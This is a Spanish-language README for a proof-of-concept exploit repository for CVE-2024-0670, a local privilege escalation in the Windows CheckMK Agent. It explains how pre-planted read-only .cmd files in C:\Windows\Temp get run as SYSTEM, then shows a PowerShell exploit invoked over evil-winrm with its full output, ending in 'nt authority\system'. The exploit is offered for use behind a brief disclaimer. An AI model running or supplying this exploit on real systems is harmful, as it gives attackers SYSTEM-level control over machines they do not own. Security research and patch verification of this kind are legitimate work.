
PoC para CVE-2024-0670
Este repositorio proporciona un exploit Proof of Concept (PoC) para la vulnerabilidad CVE-2024-0670, que afecta al CheckMK Agent en sistemas Windows. La vulnerabilidad ocurre cuando el CheckMK Agent crea y ejecuta archivos temporales en el directorio C:\Windows\Temp. Un atacante puede abusar de este comportamiento colocando previamente archivos maliciosos en ese directorio con protección contra escritura. Cuando el agente intenta crear un archivo temporal que ya existe como solo lectura, falla al sobrescribirlo pero sigue ejecutando el archivo existente con privilegios SYSTEM, lo que permite la escalada de privilegios.
Referencia del aviso: SEC Consult - Escalada de privilegios local mediante archivos escribibles en Checkmk Agent
Este proyecto está destinado únicamente con fines educativos, de investigación y pruebas de seguridad autorizadas.
No utilice este código en sistemas que no posea o para los que no tenga permiso explícito de pruebas.
El autor no es responsable de ningún daño o mal uso.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system